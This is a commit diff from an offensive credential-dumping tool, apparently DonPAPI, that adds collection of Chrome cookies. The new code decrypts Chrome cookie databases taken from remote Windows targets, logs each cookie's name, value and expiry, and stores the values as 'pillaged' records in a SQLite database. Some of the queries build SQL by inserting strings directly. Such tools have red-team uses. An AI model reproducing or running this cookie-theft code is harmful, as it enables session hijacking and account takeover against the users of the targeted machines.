STRLCPY/DonPAPI

Gathering Chrome cookies
Pierre-Alexandre Vandewoestyne committed 2 years ago

73034829

1 parent 7fff1149

■ ■ ■ ■ ■ ■

database.py

		skipped 626 lines
627	627		FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
628	628		FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
629	629		)''')
	630	+	db_conn.execute('''CREATE TABLE "cookies" (
	631	+	"id" integer PRIMARY KEY,
	632	+	"file_path" text,
	633	+	"name" text,
	634	+	"value" text,
	635	+	"expires_utc" int,
	636	+	"target" text,
	637	+	"type" text,
	638	+	"pillaged_from_computerid" integer,
	639	+	"pillaged_from_userid" integer,
	640	+	FOREIGN KEY(pillaged_from_computerid) REFERENCES computers(id),
	641	+	FOREIGN KEY(pillaged_from_userid) REFERENCES users(id)
	642	+	)''')
630	643		db_conn.execute('''CREATE TABLE "dpapi_hash" (
631	644		"id" integer PRIMARY KEY,
632	645		"file_path" text,
		skipped 391 lines
1024	1037		return user_rowid
1025	1038
1026	1039		def clear_input(self,data):
	1040	+	if isinstance(data,int):
	1041	+	return data
1027	1042		if data is None:
1028	1043		data = ''
1029	1044		result = data.replace('\x00','')
		skipped 109 lines
1139	1154
1140	1155		except Exception as ex:
1141	1156		self.logging.error(f"Exception in add_credz 4")
	1157	+	self.logging.debug(ex)
	1158	+
	1159	+	return None
	1160	+
	1161	+	def add_cookies(self, credz_type, credz_name, credz_value,credz_expires_utc, credz_target, credz_path , pillaged_from_computerid=None,pillaged_from_userid=None,pillaged_from_computer_ip=None,pillaged_from_username=None):
	1162	+	"""
	1163	+	Check if this credential has already been added to the database, if not add it in.
	1164	+	"""
	1165	+	user_rowid=None
	1166	+	try:
	1167	+	credz_name=self.clear_input(credz_name)
	1168	+	self.logging.debug(f"{credz_name} - {binascii.hexlify(credz_name.encode('utf-8'))}")
	1169	+	credz_value = self.clear_input(credz_value)
	1170	+	self.logging.debug(f"{credz_value} - {binascii.hexlify(credz_value.encode('utf-8'))}")
	1171	+	credz_expires_utc = self.clear_input(credz_expires_utc)
	1172	+	self.logging.debug(f"{credz_expires_utc}")
	1173	+	credz_target = self.clear_input(credz_target)
	1174	+	self.logging.debug(f"{credz_target} - {binascii.hexlify(credz_target.encode('utf-8'))}")
	1175	+	credz_path = self.clear_input(credz_path)
	1176	+	self.logging.debug(f"{credz_path} - {binascii.hexlify(credz_path.encode('utf-8'))}")
	1177	+	self.logging.debug(f"pillaged_from_computer_ip {pillaged_from_computer_ip} - {binascii.hexlify(pillaged_from_computer_ip.encode('utf-8'))}")
	1178	+	self.logging.debug(f"pillaged_from_username {pillaged_from_username}")
	1179	+
	1180	+
	1181	+	if pillaged_from_computer_ip != None:
	1182	+	with self.conn:
	1183	+	cur = self.conn.cursor()
	1184	+	cur.execute(f"SELECT * FROM computers WHERE LOWER(ip)=LOWER('{pillaged_from_computer_ip}')")
	1185	+	results = cur.fetchall()
	1186	+	if len(results)>0:
	1187	+	result=results[0]
	1188	+	pillaged_from_computerid=result[0]
	1189	+	self.logging.debug(f"[+] Resolved {pillaged_from_computer_ip} to id : {pillaged_from_computerid}")
	1190	+	except Exception as ex:
	1191	+	self.logging.error(f"Exception in add_cookie 1")
	1192	+	self.logging.debug(ex)
	1193	+
	1194	+	try:
	1195	+	if pillaged_from_username != None:
	1196	+	with self.conn:
	1197	+	cur = self.conn.cursor()
	1198	+	cur.execute(f"SELECT * FROM users WHERE LOWER(username)=LOWER('{pillaged_from_username}') AND pillaged_from_computerid={pillaged_from_computerid}")
	1199	+	results = cur.fetchall()
	1200	+	if len(results) > 0:
	1201	+	result = results[0]
	1202	+	pillaged_from_userid = result[0]
	1203	+	self.logging.debug(f"[+] Resolved {pillaged_from_username} on machine {pillaged_from_computerid} to id : {pillaged_from_userid}")
	1204	+	except Exception as ex:
	1205	+	self.logging.error(f"Exception in add_cookies 2")
	1206	+	self.logging.debug(ex)
	1207	+	pass
	1208	+	if pillaged_from_computerid == None or pillaged_from_userid == None :
	1209	+	self.logging.debug(f"[-] Missing computerId or UserId to register Cookie {credz_name} {credz_value} - {credz_target}")
	1210	+	#return None
	1211	+	try:
	1212	+	if pillaged_from_userid == None :
	1213	+	query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid"
	1214	+	parameters = {
	1215	+	"credz_name": credz_name,
	1216	+	"credz_value": credz_value,
	1217	+	"credz_expires_utc": credz_expires_utc,
	1218	+	"credz_type": credz_type, "credz_target": credz_target,
	1219	+	"pillaged_from_computerid": int(pillaged_from_computerid),
	1220	+	}
	1221	+	else:
	1222	+	query = "SELECT * FROM cookies WHERE LOWER(name)=LOWER(:credz_name) AND LOWER(value)=LOWER(:credz_value) AND expires_utc=:credz_expires_utc AND LOWER(type)=LOWER(:credz_type) AND LOWER(target)=LOWER(:credz_target) AND pillaged_from_computerid=:pillaged_from_computerid AND pillaged_from_userid=:pillaged_from_userid"
	1223	+	parameters = {
	1224	+	"credz_name": credz_name,
	1225	+	"credz_value": credz_value,
	1226	+	"credz_expires_utc": credz_expires_utc,
	1227	+	"credz_type": credz_type, "credz_target": credz_target,
	1228	+	"pillaged_from_computerid": int(pillaged_from_computerid),
	1229	+	"pillaged_from_userid": int(pillaged_from_userid)
	1230	+	}
	1231	+	self.logging.debug(query)
	1232	+	with self.conn:
	1233	+	cur = self.conn.cursor()
	1234	+	cur.execute(query, parameters)
	1235	+	results = cur.fetchall()
	1236	+	except Exception as ex:
	1237	+	self.logging.error(f"Exception in add_cookie 3")
	1238	+	self.logging.debug(ex)
	1239	+	try:
	1240	+	if not len(results):
	1241	+	if pillaged_from_userid == None:
	1242	+	query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :credz_path)"
	1243	+	parameters = {
	1244	+	"credz_name": credz_name,
	1245	+	"credz_value": credz_value,
	1246	+	"credz_expires_utc": credz_expires_utc,
	1247	+	"credz_target": credz_target,
	1248	+	"credz_type": credz_type,
	1249	+	"pillaged_from_computerid": int(pillaged_from_computerid),
	1250	+	"credz_path": credz_path,
	1251	+	}
	1252	+	else:
	1253	+	query = "INSERT INTO cookies (name, value, expires_utc, target, type, pillaged_from_computerid,pillaged_from_userid, file_path) VALUES (:credz_name, :credz_value, :credz_expires_utc, :credz_target, :credz_type, :pillaged_from_computerid, :pillaged_from_userid, :credz_path)"
	1254	+	parameters = {
	1255	+	"credz_name": credz_name,
	1256	+	"credz_value": credz_value,
	1257	+	"credz_expires_utc": credz_expires_utc,
	1258	+	"credz_type": credz_type,
	1259	+	"credz_target": credz_target,
	1260	+	"pillaged_from_computerid": int(pillaged_from_computerid),
	1261	+	"pillaged_from_userid": int(pillaged_from_userid),
	1262	+	"credz_path": credz_path,
	1263	+	}
	1264	+	self.logging.debug(query)
	1265	+	with self.conn:
	1266	+	cur = self.conn.cursor()
	1267	+	cur.execute(query, parameters)
	1268	+	user_rowid = cur.lastrowid
	1269	+	self.logging.debug(
	1270	+	f'added_cookies(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => {user_rowid}')
	1271	+	else:
	1272	+	self.logging.debug(
	1273	+	f'added_credential(credtype={credz_type}, target={credz_target}, name={credz_name}, value={credz_value}) => ALREADY IN DB')
	1274	+
	1275	+	except Exception as ex:
	1276	+	self.logging.error(f"Exception in add_cookie 4")
1142	1277		self.logging.debug(ex)
1143	1278
1144	1279		return None
		skipped 288 lines

■ ■ ■ ■ ■ ■

myseatbelt.py

		skipped 457 lines
458	458		self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting logindata for CHROME {user.username} {localfile} {bcolors.ENDC}")
459	459		self.logging.debug(ex)
460	460		if my_blob_type == 'ChromeCookies':
461		-	"""
462		-	myChromeSecrets.cookie_path=localfile
463		-	user.files[longname] = {}
464		-	user.files[longname]['type'] = my_blob_type
465		-	user.files[longname]['status'] = 'encrypted'
466		-	user.files[longname]['path'] = localfile
467		-	cookies=myChromeSecrets.decrypt_chrome_CookieData()
468		-	user.files[longname]['secret'] = cookies
469		-	if cookies is not None:
470		-	user.files[longname]['status'] = 'decrypted'
471		-	"""
	461	+	try:
	462	+	myChromeSecrets.cookie_path=localfile
	463	+	user.files[longname] = {}
	464	+	user.files[longname]['type'] = my_blob_type
	465	+	user.files[longname]['status'] = 'encrypted'
	466	+	user.files[longname]['path'] = localfile
	467	+	cookies=myChromeSecrets.decrypt_chrome_CookieData()
	468	+	user.files[longname]['secret'] = cookies
	469	+	if cookies is not None:
	470	+	user.files[longname]['status'] = 'decrypted'
	471	+	except Exception as ex:
	472	+	self.logging.debug(f"[{self.options.target_ip}] {bcolors.WARNING}Exception decrypting CookieData for CHROME {user.username} {localfile} {bcolors.ENDC}")
	473	+	self.logging.debug(ex)
472	474
473	475		except Exception as ex:
474	476		self.logging.debug(
		skipped 1509 lines

■ ■ ■ ■ ■ ■

software/browser/chrome_decrypt.py

1	1		import sys
2	2		import sqlite3,os,json,base64,binascii
	3	+	from datetime import datetime,timedelta
3	4		from lib.toolbox import bcolors
4	5		from lib.dpapi import *
5	6
		skipped 146 lines
152	153		#path = '192.168.20.141\\Users\\Administrateur.TOUF\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\'
153	154		try:
154	155		if self.cookie_path!=None:
	156	+	self.logging.debug(f"[{self.options.target_ip}] [+] Decrypting Chrome cookie in {self.cookie_path}")
	157	+
155	158		if os.path.isfile(self.cookie_path):
156	159		connection = sqlite3.connect(self.cookie_path)
157	160		with connection:
		skipped 2 lines
160	163		'select host_key, "TRUE", path, "FALSE", expires_utc, name, encrypted_value from cookies')
161	164		values = v.fetchall()
162	165
	166	+	self.logging.debug(f"[{self.options.target_ip}] [+] Found {len(values)} Chrome cookies")
163	167		for host_key, _, path, _, expires_utc, name, encrypted_value in values:
164		-	#self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{value},{len(value)}")
	168	+	self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, cookie name: {name}, expire at utc :{(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
165	169		self.cookies[host_key]={}
166	170		self.cookies[host_key][name]=self.decrypt_chrome_password(encrypted_value)
167		-	self.logging.debug(f"[{self.options.target_ip}] [+] Found Chrome cookie for {host_key}, {path}, {name},{self.cookies[host_key][name]}")
	171	+	############PROCESSING DATA
	172	+	self.db.add_cookies(credz_type='browser-chrome',
	173	+	credz_name=name,
	174	+	credz_value=self.cookies[host_key][name],
	175	+	credz_expires_utc=expires_utc,
	176	+	credz_target=host_key,
	177	+	credz_path='',
	178	+	pillaged_from_computer_ip=self.options.target_ip,
	179	+	pillaged_from_username=self.username)
	180	+	self.logging.info(f"[{self.options.target_ip}] [+] {bcolors.OKGREEN}[Chrome Cookie] {bcolors.ENDC} for {host_key} {bcolors.OKBLUE}[ {name}:{self.cookies[host_key][name]} ] {bcolors.ENDC} expire time: {(datetime(1601, 1, 1) + timedelta(microseconds=expires_utc)).strftime('%b %d %Y %H:%M:%S')}")
168	181
169	182		except sqlite3.OperationalError as e:
170	183		e = str(e)
171	184		if (e == 'database is locked'):
172		-	print('[!] Make sure Google Chrome is not running in the background')
	185	+	self.logging.debug(f"[{self.options.target_ip}] [!] Make sure Google Chrome is not running in the background")
173	186		elif (e == 'no such table: logins'):
174		-	print('[!] Something wrong with the database name')
	187	+	self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database name")
175	188		elif (e == 'unable to open database file'):
176		-	print('[!] Something wrong with the database path')
177		-	else:
178		-	print(e)
	189	+	self.logging.debug(f"[{self.options.target_ip}] [!] Something wrong with the database path")
	190	+	self.logging.debug(f"[{self.options.target_ip}] {e}")
179	191		return None
180	192
181	193		return self.cookies

Gathering Chrome cookies